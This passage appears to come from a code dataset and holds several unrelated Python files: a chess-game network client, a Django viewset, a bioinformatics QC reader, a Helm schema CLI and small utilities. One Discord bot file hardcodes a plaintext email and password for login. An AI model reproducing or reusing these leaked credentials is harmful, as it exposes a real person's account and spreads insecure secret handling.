\"delete\":\n\t\t\tself.deleteCompound(submit_dict)\n\t\t# close dialog\n\t\tself.dialog.close()\n\tdef 
newCompound(self,dialog_content_dict):\n\t\t# get publication id\n\t\tpublication_id = self.getNextId()\n\t\t# new \n\t\tquery_list = {\n\t\t\t\"database\" : \"nlp\",\n\t\t\t\"query_type\" : \"INSERT\",\n\t\t\t\"table\" : \"compounds\",\n\t\t\t\"id\" : publication_id,\n\t\t}\n\t\tQueries(query_list)\n\t\t# add dialog content\n\t\tvalues_list = {\n\t\t\t\"singular\" : dialog_content_dict[\"singular\"],\n\t\t\t\"plural\" : dialog_content_dict[\"plural\"],\n\t\t\t\"environments\" : dialog_content_dict[\"environments\"],\n\t\t}\n\t\tquery_list = {\n\t\t\t\"database\" : \"nlp\",\n\t\t\t\"query_type\" : \"UPDATE\",\n\t\t\t\"table\" : \"compounds\",\n\t\t\t\"id\" : publication_id,\n\t\t\t\"values_list\" : values_list\n\t\t}\n\t\tQueries(query_list)\n\t\t# refresh\n\t\tself.refreshPage()\n\tdef getNextId(self):\n\t\tcolumns_list = {\"id\"}\n\t\tquery_list = {\n\t\t\t\"database\" : \"nlp\",\n\t\t\t\"query_type\" : \"SELECT\",\n\t\t\t\"table\" : \"compounds\",\n\t\t\t\"columns_list\" : columns_list,\n\t\t}\n\t\tcontent = Queries(query_list)\n\t\tresult = content.returnResult()\n\t\tnext_ids_list = [0]\t\t\n\t\tfor next_id in result:\n\t\t\tnext_ids_list.append(int(next_id[0]))\n\t\tfree_next_ids_list = []\n\t\tfor free_next_id in range(1,next_ids_list[-1]+1):\n\t\t\tif free_next_id not in next_ids_list:\n\t\t\t\tfree_next_ids_list.append(free_next_id)\t\n\t\tif not len(free_next_ids_list):\n\t\t\tnext_id = next_ids_list[-1]+1\n\t\telse:\n\t\t\tnext_id = min(free_next_ids_list)\n\t\treturn next_id\t\n\tdef editCompound(self,submit_dict,dialog_content_dict):\n\t\t# dialog content \n\t\tvalues_list = {\n\t\t\t\"singular\" : dialog_content_dict[\"singular\"],\n\t\t\t\"plural\" : dialog_content_dict[\"plural\"],\n\t\t\t\"environments\" : dialog_content_dict[\"environments\"],\n\t\t}\n\t\tquery_list = {\n\t\t\t\"database\" : \"nlp\",\n\t\t\t\"query_type\" : \"UPDATE\",\n\t\t\t\"table\" : \"compounds\",\n\t\t\t\"id\" : submit_dict[\"id\"],\n\t\t\t\"values_list\" : values_list\n\t\t}\n\t\tQueries(query_list)\n\t\t# refresh\n\t\tself.refreshPage()\n\tdef deleteCompound(self,submit_dict):\n\t\tquert_list = {\n\t\t\t\"database\" : \"nlp\",\n\t\t\t\"query_type\" : \"DELETE\",\n\t\t\t\"table\" : \"compounds\",\n\t\t\t\"publication_id\" : submit_dict[\"id\"],\n\t\t}\n\t\tQueries(quert_list)\n\t\t# refresh\n\t\tself.refreshPage()\n\tdef refreshPage(self):\n\t\tself.window().clearLayout()\n\t\tself.window().editCompounds()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"EditCompounds.py","file_name":"EditCompounds.py","file_ext":"py","file_size_in_byte":9220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"67089599","text":"import csv, glob, os\n\nclass QcMetrics(object):\n\n def __init__(self, dn):\n \"\"\"\n Expectations is a dictionary where the key is a glob\n pattern and the value is the number of files expected to be returned\n \"\"\"\n self.dn = dn\n\n #-- __init__\n\n @staticmethod\n def verifyBamID_bn():\n return \"verify_bam_id.selfSM\"\n\n def verifyBamID_GT_bn():\n return \"GT_verify_bam_id.selfSM\"\n\n def verifyBamID_fn(self):\n bn = QcMetrics.verifyBamID_bn()\n files = glob.glob( os.path.join(self.dn, bn) )\n if len(files) == 1: return files[0]\n bn_gt = QcMetrics.verifyBamID_GT_bn()\n files = glob.glob( os.path.join(self.dn, bn_gt) )\n if len(files) == 1: return files[0]\n raise FileNotFoundError(\"Failed to find verify bam id file ({} or {}) in {}\".format(bn, bn_gt, self.dn))\n\n def verifyBamID_metrics(self):\n fn = 
self.verifyBamID_fn()\n        with open(fn, \"r\") as f:\n            rdr = csv.DictReader(f, delimiter=\"\\t\")\n            metrics = next(rdr)\n        if metrics is None:\n            raise Exception(\"Failed to find Verify BamID metrics in {}\".format(fn))\n        return metrics\n\n    #-- verifyBamID\n\n    @staticmethod\n    def picard_wgs_bn():\n        return \"wgs_metric_summary.txt\"\n\n    def picard_wgs_fn(self):\n        bn = QcMetrics.picard_wgs_bn()\n        files = glob.glob( os.path.join(self.dn, bn) )\n        if len(files) == 1: return files[0]\n        raise FileNotFoundError(\"Failed to find picard wgs ({}) in {}\".format(bn, self.dn))\n\n    def picard_wgs_metrics(self):\n        fn = self.picard_wgs_fn()\n        with open(fn, \"r\") as f:\n            for l in f:\n                if l.rstrip() == \"## METRICS CLASS\\tpicard.analysis.CollectWgsMetrics$WgsMetrics\":\n                    break\n            rdr = csv.DictReader(f, delimiter=\"\\t\")\n            metrics = next(rdr)\n        if metrics is None:\n            raise Exception(\"Failed to find Picard WGS metrics in {}\".format(fn))\n        return metrics\n\n    #-- picard wgs\n\n#-- QcMetrics\n","sub_path":"laims/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"322835846","text":"from django.urls import path\nfrom .views import (\n    dashboard, \n    categories, \n    course_overview, \n    category_single, \n    chats,\n    instructors,\n    students\n)\nurlpatterns = [\n    path('', dashboard, name='home'),\n    path('courses/', course_overview, name='courses'),\n    path('categories/', categories, name='categories' ),\n    path('category/', category_single, name=\"category\"),\n    path('chats/', chats, name=\"chats\"),\n    path('students/', students, name=\"students\"),\n    path('instructors/', instructors, name=\"instructors\"),\n    \n]","sub_path":"src/dashboard/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"547533532","text":"import pygame\nfrom pygame.locals import *\nimport wx\nimport sys\nimport traceback\nimport time\nimport socket\nimport threading\nimport json\nfrom AI import *\npygame.init()\n\n# game parameters\nblueSide = 1\nredSide = 0\nPlayer = redSide # red side moves first\nredScore = 0\nblueScore = 0\nFPS = 50 # refresh rate\ncanRedStop = False\ncanBlueStop = False\n# todo\nselectedPiecesBefore = None\nisSelectedBefore = False\n\n# state parameter\ngameState = 0\n\n'''\n0 - game not started\n1 - game in progress\n3 - connection failed\n4 - opponent called a stop\n7 - opponent timed out\n8 - we timed out\n9 - we quit the game\n10 - opponent quit the game\n11 - we called a stop\n'''\n\n# network parameters\nSERVER_IP = '127.0.0.1'\nuserName = 'yan'\nPORT = 50005\nclock = pygame.time.Clock()\n\n# match parameters\nSide = None\ngame_ID = None\ncounterPartName = None\nsrc_Pos = None\ndst_Pos = None\nexp = None\nnumber = None\neventSide = None\n\n# fonts and colors\nfont_30 = pygame.font.SysFont('consolas', 30)\nfont_Arial_28 = pygame.font.SysFont('arial', 28)\nWHITE = [255, 255, 255]\nBLACK = [0, 0, 0]\nRED = [255, 0, 0]\nBLUE = [0, 0, 238]\nVIOLET = [160, 32, 240]\nYELLOW = [255, 255, 0]\nGRAY = [211, 211, 211]\nORANGE = [255, 127, 0]\n\nBLUE_HOME = [[0, 7], [3, 10], [3, 6], [3, 8], [3, 4], [2, 5], [2, 7], [2, 9], [1, 8], [1, 6]]\nRED_HOME = [[14, 7], [11, 4], [11, 8], [11, 6], [11, 10], [12, 9], [12, 7], [12, 5], [13, 6], [13, 8]]\n
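# 15x15 board mask for the star-shaped board: 0 marks a playable point, 1 marks an unused cell\n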
CHESSBOARD = [\n    [1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1],\n    [1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 1, 1, 1],\n    [1, 1, 1, 1, 1, 0, 1, 0, 1, 0, 1, 1, 1, 1, 1],\n    [1, 1, 1, 1, 0, 1, 0, 1, 0, 1, 0, 1, 1, 1, 1],\n    [1, 1, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 1, 1],\n    [1, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 1],\n    [1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1],\n    [0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0],\n    [1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1],\n    [1, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 1],\n    [1, 1, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 1, 1],\n    [1, 1, 1, 1, 0, 1, 0, 1, 0, 1, 0, 1, 1, 1, 1],\n    [1, 1, 1, 1, 1, 0, 1, 0, 1, 0, 1, 1, 1, 1, 1],\n    [1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 1, 1, 1],\n    [1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1]]\n\n\nclass CHESS:\n    def __init__(self, number, role, pos, index):\n        self.position = x, y = pos\n        self.realpos = (x + 1) * 60, (y + 1) * 40\n        self.number = number\n        self.role = role\n        self.index = index\n\n\nChessList = []\nLINE = []\n\n\n# add the board lines\ndef initLine():\n    global LINE\n    for i in range(8):\n        temp1 = [((i + 1) * 60, (8 + i) * 40), ((8 + i) * 60, (i + 1) * 40)]\n        temp2 = [((i + 1) * 60, (8 - i) * 40), ((i + 8) * 60, (15 - i) * 40)]\n        LINE.append(temp1)\n        LINE.append(temp2)\n        if i != 0:\n            temp3 = [((i + 1) * 60, (8 - i) * 40), ((i + 1) * 60, (8 + i) * 40)]\n            LINE.append(temp3)\n    for i in range(6):\n        temp4 = [((i + 9) * 60, (i + 2) * 40), ((i + 9) * 60, (14 - i) * 40)]\n        LINE.append(temp4)\n\n\n# initialize the pieces\ndef initPieces():\n    ChessList.append(CHESS(0, blueSide, [0, 7], 0))\n    ChessList.append(CHESS(1, blueSide, [3, 10], 1))\n    ChessList.append(CHESS(2, blueSide, [3, 6], 2))\n    ChessList.append(CHESS(3, blueSide, [3, 8], 3))\n    ChessList.append(CHESS(4, blueSide, [3, 4], 4))\n    ChessList.append(CHESS(5, blueSide, [2, 5], 5))\n    ChessList.append(CHESS(6, blueSide, [2, 7], 6))\n    ChessList.append(CHESS(7, blueSide, [2, 9], 7))\n    ChessList.append(CHESS(8, blueSide, [1, 8], 8))\n    ChessList.append(CHESS(9, blueSide, [1, 6], 9))\n    ChessList.append(CHESS(0, redSide, [14, 7], 10))\n    ChessList.append(CHESS(1, redSide, [11, 4], 11))\n    ChessList.append(CHESS(2, redSide, [11, 8], 12))\n    ChessList.append(CHESS(3, redSide, [11, 6], 13))\n    ChessList.append(CHESS(4, redSide, [11, 10], 14))\n    ChessList.append(CHESS(5, redSide, [12, 9], 15))\n    ChessList.append(CHESS(6, redSide, [12, 7], 16))\n    ChessList.append(CHESS(7, redSide, [12, 5], 17))\n    ChessList.append(CHESS(8, redSide, [13, 6], 18))\n    ChessList.append(CHESS(9, redSide, [13, 8], 19))\n\n\ndef INIT():\n    initLine()\n    initPieces()\n\n\n# given a position, check whether a piece is there; returns a bool and a CHESS instance\ndef findPointbyPos(pos):\n    global ChessList\n    for chess in ChessList:\n        if chess.position == pos:\n            return True, chess\n    return False, None\n\n\n# given the current mouse click coordinates, return a bool and the board coordinates x, y\ndef getPos(event):\n    global CHESSBOARD\n    for i in range(15):\n        for j in range(15):\n            if CHESSBOARD[i][j] == 0 and (event.pos[0] - (i + 1) * 60) ** 2 + (event.pos[1] - (j + 1) * 40) ** 2 <= 18 ** 2:\n                return True, i, j\n    return False, None, None\n\n\n# calculate the scores\ndef calculateScore():\n    global blueScore, redScore\n    blueScore = 0\n    redScore = 0\n    for i in range(10):\n        if ChessList[i].position in RED_HOME:\n            blueScore = blueScore + ChessList[i].number * RED_HOME.index(ChessList[i].position)\n        if ChessList[i + 10].position in BLUE_HOME:\n            redScore = redScore + ChessList[i + 10].number * BLUE_HOME.index(ChessList[i + 10].position)\n    # score calculation function\n\n\ndef paintBackGround(screen):\n    global canBlueStop, canRedStop, Side, font_30, isSelectedBefore, selectedPiecesBefore, blueScore, redScore\n    global src_Pos, dst_Pos\n\n    # background and title\n    pan_img = pygame.image.load('./pic/th.png').convert()\n    screen.blit(pan_img, (0, 0))\n    pygame.display.set_caption(\"International Number Chess - AI version\")\n    # position circles\n    for i in range(15):\n        for j in range(15):\n            if CHESSBOARD[i][j] == 0:\n                pygame.draw.circle(screen, WHITE, [(i + 1) * 60, (j + 1) * 40], 18, 0)\n
    # connecting lines\n    for line in LINE:\n        pygame.draw.aaline(screen, WHITE, line[0], line[1], 30)\n    # base numbers printed under the home positions\n    for i in range(10):\n        text = font_Arial_28.render(str(i), True, BLUE)\n        text1 = font_Arial_28.render(str(i), True, RED)\n        screen.blit(text, ((BLUE_HOME[i][0] + 1) * 60 - 7, (BLUE_HOME[i][1] + 1) * 40 - 15))\n        screen.blit(text1, ((RED_HOME[i][0] + 1) * 60 - 7, (RED_HOME[i][1] + 1) * 40 - 15))\n\n    # quit label and its frame\n    text = font_30.render('QUIT', True, BLACK, WHITE)\n    screen.blit(text, (850, 10))\n    pygame.draw.rect(screen, BLACK, (849, 9, 71, 32), 3)\n\n    # scoreboard\n    text1 = font_30.render('BlueScore: ' + str(blueScore), True, BLUE)\n    screen.blit(text1, (5, 10))\n    text2 = font_30.render('RedScore : ' + str(redScore), True, RED)\n    screen.blit(text2, (5, 48))\n    # whose turn it is\n    if Side == None or Player == None:\n        pass\n    else:\n        if Player == Side:\n            text3 = font_Arial_28.render('YOU NOW !', True, VIOLET)\n            pygame.draw.rect(screen, VIOLET, ((749, 78, 160, 32)), 2)\n            screen.blit(text3, (750, 80))\n        elif Player != Side:\n            text3 = font_Arial_28.render('NOT YOU NOW !', True, VIOLET)\n            pygame.draw.rect(screen, VIOLET, ((728, 78, 228, 32)), 2)\n            screen.blit(text3, (730, 80))\n        else:\n            pass\n    # which side you play\n    if Side == 0:\n        text = font_Arial_28.render('You ARE the RED', True, ORANGE)\n    else:\n        text = font_Arial_28.render('You ARE the BLUE', True, ORANGE)\n    screen.blit(text, (5, 82))\n\n    # highlight frames around the last move\n    if src_Pos and dst_Pos and Player != Side:\n        pygame.draw.rect(screen, YELLOW, ((src_Pos[0] + 1) * 60 - 20, (src_Pos[1] + 1) * 40 - 20, 39, 39), 2)\n        pygame.draw.rect(screen, YELLOW, ((dst_Pos[0] + 1) * 60 - 20, (dst_Pos[1] + 1) * 40 - 20, 39, 39), 2)\n\n    return True\n\n\n# draw the pieces\ndef paintpieces(screen):\n    global ChessList\n\n    for CHESS in ChessList:\n        img1 = pygame.image.load('./pic/' + str(CHESS.role) + str(CHESS.number) + '.png').convert()\n        img2 = pygame.Surface((36, 36))\n        pygame.transform.scale(img1, (36, 36), img2)\n        screen.blit(img2, ((CHESS.position[0] + 1) * 60 - 18, (CHESS.position[1] + 1) * 40 - 18))\n\n\ndef isStop():\n    global canBlueStop, canRedStop\n\n    num_b = 0 # number of blue pieces that have arrived\n    num_r = 0 # number of red pieces that have arrived\n    for i in range(10):\n        if ChessList[i].position in RED_HOME:\n            num_b += 1\n        if ChessList[i + 10].position in BLUE_HOME:\n            num_r += 1\n    if num_b == 10: # todo\n        canBlueStop = True\n    if num_r == 10:\n        canRedStop = True\n\n\n# switch the side to move\ndef swapHand():\n    global Player\n    if Player == redSide:\n        Player = blueSide\n    else:\n        Player = redSide\n\n\ndef MoveChess(index, pos):\n    ChessList[index].position = pos\n\n\n# show a pop-up message window\ndef showtips(str, title):\n    app = wx.App()\n    wx.MessageBox(str, title, wx.OK | wx.ICON_INFORMATION)\n\n\n\ndef going_chess():\n    global is_Moved, ChessList\n    while True:\n        if gameState == 1:\n            if Side == 0 and number != None:\n                if ChessList[number].position == dst_Pos:\n                    pass\n                else:\n                    MoveChess(number, dst_Pos)\n                    swapHand()\n                    isStop()\n                    calculateScore()\n            elif Side == 1 and number != None:\n                if ChessList[number + 10].position == dst_Pos:\n                    pass\n                else:\n                    MoveChess(number + 10, dst_Pos)\n                    swapHand()\n                    isStop()\n                    calculateScore()\n            else:\n                pass\n        else:\n            break\n        time.sleep(1)\n\n\ndef sendMoveTo(client, nextOp):\n    global game_ID, ChessList\n    num = ChessList[nextOp[0]].number\n    src = nextOp[1]\n    dst = nextOp[2]\n    exp = nextOp[3]\n    msg = {\n        \"type\": 1,\n        \"msg\": {\"game_id\": game_ID, \"side\": Side, \"num\": num,\n                \"src\": {\"x\": src[0], \"y\": src[1]},\n                \"dst\": {\"x\": dst[0], \"y\": dst[1]},\n                \"exp\": exp\n                }\n    }\n    client.send(json.dumps(msg).encode('utf-8'))\n\n
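# server message \"type\" values as used in this file: 0 = join with a user name, 1 = send a move, 2 = stop/quit request, 3 = acknowledgement sent before closing\n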
\ndef recvMsg():\n    global gameState, game_ID, counterPartName, Side, src_Pos, dst_Pos, exp, number, eventSide, client, is_Moved, ChessList, SERVER_IP\n    gameState = 1\n\n    try:\n        client = socket.socket()\n        client.connect((SERVER_IP, PORT))\n        send_msg = {\"type\": 0, \"msg\": {\"name\": userName}}\n        client.send(json.dumps(send_msg).encode('utf-8'))\n        t1 = threading.Thread(target=going_chess)\n        t1.setDaemon(True)\n        t1.start()\n    except:\n        traceback.print_exc()\n        showtips('Connection failed, please check that the IP address is correct!', 'Error')\n        gameState = 3\n\n    while gameState == 1:\n        try:\n            msg = json.loads(client.recv(2048).decode('utf-8'))\n            print(344, msg)\n        except:\n            msg = None\n            gameState = 0\n        if msg == None:\n            continue\n        if 'status' not in msg and 'num' in msg: # move message\n            number = msg['num']\n            src_Pos = [msg['src']['x'], msg['src']['y']]\n            dst_Pos = [msg['dst']['x'], msg['dst']['y']]\n            exp = msg['exp']\n            continue\n        if 'status' in msg and msg['status'] == 1: # match-found message\n            game_ID = msg['game_id']\n            counterPartName = msg['counterpart_name']\n            Side = msg['side']\n            continue\n        elif 'status' in msg and msg['status'] == 2: # quit or stop\n            if msg['request'] == 'stop':\n                if msg['side'] == Side:\n                    gameState = 11\n                else:\n                    gameState = 4\n            elif msg['request'] == 'quit':\n                if msg['side'] == Side:\n                    gameState = 9\n                else:\n                    gameState = 10\n                sendmsg = {\"type\": 3, \"side\": Side}\n                client.send(json.dumps(sendmsg).encode('utf-8'))\n                client.close()\n                break\n        elif 'status' in msg and msg['status'] == 3: # timeout\n            if msg['side'] == Side:\n                gameState = 8\n            else:\n                gameState = 7\n            sendmsg = {\"type\": 3, \"side\": Side}\n            client.send(json.dumps(sendmsg).encode('utf-8'))\n            client.close()\n            break\n    if client == None:\n        gameState = 0\n\n\ndef judgeWin():\n    global blueScore, redScore\n    if blueScore > redScore:\n        showtips('Game over, Blue wins!', 'Congratulations')\n    elif blueScore == redScore:\n        showtips('Game over, it is a draw!', 'Congratulations')\n    else:\n        showtips('Game over, Red wins!', 'Congratulations')\n\ndef goingchessbyai():\n    while gameState == 1:\n        if Player == Side:\n            nextOp = maxMinSearch(State(ChessList, None), Side)\n            print(nextOp)\n            sendMoveTo(client, nextOp)\n            MoveChess(nextOp[0], nextOp[2])\n            swapHand()\n            calculateScore()\n        else:\n            time.sleep(1)\n            continue\n\n\n\ndef main():\n    global selectedPiecesBefore, isSelectedBefore, gameState, client, game_ID, ChessList, canRedStop, canBlueStop\n    screen = pygame.display.set_mode([960, 640])\n    INIT() # initialize pieces and lines\n\n    t2 = threading.Thread(target=recvMsg)\n    t2.setDaemon(True)\n    t2.start()\n\n    t3 = threading.Thread(target=goingchessbyai)\n    t3.setDaemon(True)\n    t3.start()\n\n    while True:\n        clock.tick(FPS)\n        for event in pygame.event.get():\n            if event.type == pygame.QUIT:\n                gameState = 9\n                break\n            if event.type == MOUSEBUTTONDOWN:\n                if event.button == 1 and event.pos[0] >= 850 and event.pos[0] <= 930 and event.pos[1] >= 10 and event.pos[1] <= 42: # quit button\n                    gameState = 9\n                    break\n                else:\n                    pass\n\n        isStop()\n        calculateScore()\n        if (Side == 0 and canRedStop) or (Side == 1 and canBlueStop):\n            gameState = 11\n\n\n        if gameState == 1:\n            paintBackGround(screen)\n            paintpieces(screen)\n        elif gameState == 3:\n            break\n        elif gameState == 4:\n            judgeWin()\n            break\n        elif gameState == 7:\n            showtips('Opponent timed out, YOU WIN !!', 'Congratulations')\n            break\n        elif gameState == 8:\n            showtips('We timed out, YOU LOSE !!', 'QAQ')\n            break\n        elif gameState == 9:\n            showtips('You have quit the game', '0.0')\n            msg = {\"type\": 2, \"msg\": {\"request\": \"quit\", \"game_id\": game_ID, \"side\": Side}}\n            client.send(json.dumps(msg).encode('utf-8'))\n            break\n        elif gameState == 10:\n            showtips('Opponent has quit the game, YOU WIN !!', '0.0')\n            break\n        elif gameState == 11:\n            judgeWin()\n
{\"request\": \"stop\", \"game_id\": game_ID, \"side\": Side}}\n client.send(json.dumps(msg).encode('utf-8'))\n break\n else:\n pass\n\n pygame.display.flip()\n\n client.close()\n pygame.quit()\n sys.exit()\n\n\nif __name__ == '__main__':\n try:\n main()\n except SystemExit:\n print(\"游戏正常退出\")\n except:\n print(\"游戏退出异常\")\n traceback.print_exc()\n pygame.quit()\n sys.exit()\n input()\n","sub_path":"tempAI.py","file_name":"tempAI.py","file_ext":"py","file_size_in_byte":15203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"463903776","text":"import os\n\nfrom idlewild.schematools import (\n parse_and_build_idl_file,\n setup_logging\n)\n\nfrom .fixtures import (\n get_hero,\n get_human,\n get_droid,\n get_friends,\n update_character,\n)\n\nsetup_logging()\n\ndatafetchers = {\n 'human': lambda human, info, **args: get_human(args['id']),\n 'droid': lambda droid, info, **args: get_droid(args['id']),\n 'hero': lambda root, info, **args: get_hero(args.get('episode')),\n 'friends': lambda character, *_: get_friends(character),\n 'updateCharacterName': lambda hero, info, **args: update_character(\n args['id'], args['newName']\n ),\n}\n\ninterface_resolvers = {\n 'Character': lambda character, info: (\n 'Human' if get_human(character.id) else 'Droid'\n )\n}\n\n# Load the file\n__location__ = os.path.realpath(\n os.path.join(os.getcwd(), os.path.dirname(__file__)))\n\n# Build the schema\nschema = parse_and_build_idl_file(\n os.path.join(__location__, 'starwars.graphqls'),\n resolver_mappings=datafetchers,\n interface_resolver_mappings=interface_resolvers,\n)\n\nStarWarsSchema = schema\n","sub_path":"tests/mutations/starwars_mutation_schema.py","file_name":"starwars_mutation_schema.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"374465408","text":"#! /usr/bin/env python3\n\n# write a python program to get a comma separated sequence of words, sort them\n# then print them separated by commas\n\n# get input from user -- keep asking until we get a comma separated list\ngood_input = False\nwhile good_input == False:\n usr_input = input(\"Enter a list of words separated by a comma: \")\n if ',' in usr_input:\n good_input = True\n else:\n print(\"I said separated by a comma...please try again\")\n\n\n# split words by ',' delimiter\nwords = usr_input.split(',')\n\n# sort list\nsorted_words = sorted(words)\n\n# print new sorted list using ',' as a delimiter\nprint(\",\".join(sorted_words))","sub_path":"source/lesson3/ice_3_2a.py","file_name":"ice_3_2a.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"338781602","text":"import os\nimport subprocess\n\nimport click\n\nfrom .values import HelmValues\n\n\ndef git_repo_root():\n return subprocess.check_output([\"git\", \"rev-parse\", \"--show-toplevel\"]).decode(\"utf-8\").strip()\n\n\nCLI_HELP = \"\"\"Tools to help generate the schema file for the Dagster Helm chart.\n\"\"\"\n\n\n@click.group(help=CLI_HELP)\ndef cli():\n pass\n\n\n@cli.command()\n@click.option(\n \"--command\", type=click.Choice([\"show\", \"apply\"], case_sensitive=False), default=\"show\"\n)\ndef schema(command):\n \"\"\"Generates the `values.schema.json` file according to user specified pydantic models.\n\n By default, the schema is printed on the console. 
If the schema is as expected, use\n `--command=apply` to save the changes on the existing `values.schema.json`.\n \"\"\"\n schema_json = HelmValues.schema_json(indent=4)\n\n if command == \"show\":\n click.echo(schema_json, nl=False)\n elif command == \"apply\":\n values_schema_path = os.path.join(git_repo_root(), \"helm/dagster/values.schema.json\")\n with open(values_schema_path, \"w\") as f:\n f.write(schema_json)\n\n\ndef main():\n click_cli = click.CommandCollection(sources=[cli], help=CLI_HELP)\n click_cli()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"helm/dagster/schema/schema/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"94125761","text":"import discord\nfrom discord.ext import commands\n\ndescription = \"\"\"A utility bot for Chronicles of Darkness/New World of Darkness tabletops.\"\"\"\nbot = commands.Bot(command_prefix=\"/\", description=description)\n\nextensions = [\n \"cogs.characters\"\n]\n\n@bot.event\nasync def on_ready():\n \"\"\" Outputs username and id of bot. Attempts to load extensions. \"\"\"\n print(\"Logged in as\")\n print(bot.user.name)\n print(bot.user.id)\n print(\"------\")\n\n # Attempt to load cogs\n for extension in extensions:\n try:\n bot.load_extension(extension)\n except Exception as e:\n exc = '{}: {}'.format(type(e).__name__, e)\n print('Failed to load extension {}\\n{}'.format(extension, exc))\n\n@bot.command()\nasync def adds(left : int, right : int):\n \"\"\"Adds two numbers together.\"\"\"\n await bot.say(left + right)\n\nbot.run(\"kalynisanerd+chronicler@gmail.com\", \"Echidna5\")","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"247734907","text":"from tkinter import *\nimport requests\n\nURl = \"https://api.kanye.rest\"\n\n\ndef get_quote():\n\n response = requests.get(\"https://api.kanye.rest\")\n if response.status_code == 200:\n quote_dict = response.json()\n quote = quote_dict[\"quote\"]\n canvas.itemconfig(quote_text,text =quote)\n\n\n\nwindow = Tk()\nwindow.title(\"Kanye Says...\")\nwindow.config(padx=50, pady=50)\n\n\ncanvas = Canvas(width=300, height=414)\nbackground_img = PhotoImage(file=\"background.png\")\ncanvas.create_image(150, 207, image=background_img)\nquote_text = canvas.create_text(150, 207, text=\"Kanye Quote Goes HERE\", width=250, font=(\"Arial\", 20, \"bold\"), fill=\"white\")\ncanvas.grid(row=0, column=0)\nget_quote()\n\nkanye_img = PhotoImage(file=\"kanye.png\")\nkanye_button = Button(image=kanye_img, highlightthickness=0, borderwidth=0, command=get_quote)\nkanye_button.grid(row=1, column=0)\n\n\n\nwindow.mainloop()","sub_path":"Day33/Kanye_quotes/kanye_quote_main.py","file_name":"kanye_quote_main.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"255181163","text":"from django.db import transaction\nfrom rest_framework.decorators import action\nfrom rest_framework import status\n\nfrom core.views import APIAuthViewSet, APIViewException\nfrom do_with.models import Group, GroupUser\nfrom do_with.serializers import GroupSerializer, GroupUserSerializer\n\nclass GroupViewSet(APIAuthViewSet):\n queryset = Group.objects.all()\n serializer_class = GroupSerializer\n auth_required_actions = '__all__'\n\n def list(self, request):\n \"\"\"\n GET\n /groups\n 
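get_quote in the Kanye quote app above checks status_code manually and silently does nothing on failure, leaving the canvas text stale. A slightly more defensive standalone sketch adds a timeout and raises on HTTP errors so a dead endpoint surfaces; the URL is the same public endpoint the app already calls.

import requests

def fetch_kanye_quote(url="https://api.kanye.rest", timeout=5):
    """Return the quote string, raising on network or HTTP errors."""
    response = requests.get(url, timeout=timeout)  # timeout avoids a hung GUI
    response.raise_for_status()                    # 4xx/5xx become exceptions
    return response.json()["quote"]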
\"\"\"\n groups = self.get_queryset().filter(user_id=request.user.id)\n serializer = self.get_serializer(groups, many=True)\n\n return self.get_response(data=serializer.data)\n\n def create(self, request):\n self.json_data['user_id'] = request.user.id\n group_serializer = self.get_serializer(data=self.json_data)\n\n if not group_serializer.is_valid():\n raise APIViewException(error=group_serializer.errors)\n\n group_serializer.save()\n group = group_serializer.data\n group_user = {\"user_id\": request.user.id, \"group_id\": group.get('id'), \"status\": 'APPROVED'}\n group_user_serializer = GroupUserSerializer(data=group_user)\n\n if not group_user_serializer.is_valid():\n raise APIViewException(error=group_user_serializer.errors)\n\n group_user_serializer.save()\n\n return self.get_response(status.HTTP_201_CREATED, data={'group': group_serializer.data, 'group_user': group_user_serializer.data})\n\n def update(self, request, pk=None):\n \"\"\"\n /groups/:pk\n \"\"\"\n group = self.get_object()\n serializer = self.get_serializer(group, data=self.json_data, partial=True)\n\n if not serializer.is_valid():\n raise APIViewException(error=serializer.errors)\n\n serializer.save()\n return self.get_response(status.HTTP_201_CREATED, data=serializer.data)\n\n @transaction.atomic\n @action(methods=['put'], detail=True)\n def image(self, request, pk=None):\n \"\"\"\n /groups/image/:pk\n \"\"\"\n user_id = request.user.id\n try:\n group = Group.objects.get(id=pk)\n except:\n raise APIViewException(status=status.HTTP_404_NOT_FOUND)\n\n if group.user_id != user_id:\n return self.get_response(status=status.HTTP_401_UNAUTHORIZED)\n\n try:\n image = request.data.get('file')\n except:\n raise APIViewException(status=status.HTTP_400_BAD_REQUEST)\n\n serializer = self.get_serializer(group, {'profile_image': image}, partial=True)\n if not serializer.is_valid():\n raise APIViewException(error=serializer.errors)\n\n serializer.save()\n return self.get_response(data=serializer.data, 